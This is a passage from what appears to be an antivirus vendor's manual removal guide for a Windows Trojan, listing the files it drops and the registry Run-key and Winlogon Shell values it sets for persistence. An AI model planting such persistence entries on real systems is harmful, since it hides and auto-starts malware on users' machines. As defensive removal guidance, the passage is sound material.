    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
    %System%\wbem\Logs\wbemprox.log (75 bytes)
    C:\NTKernel\nt32.exe (2105 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

  5. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
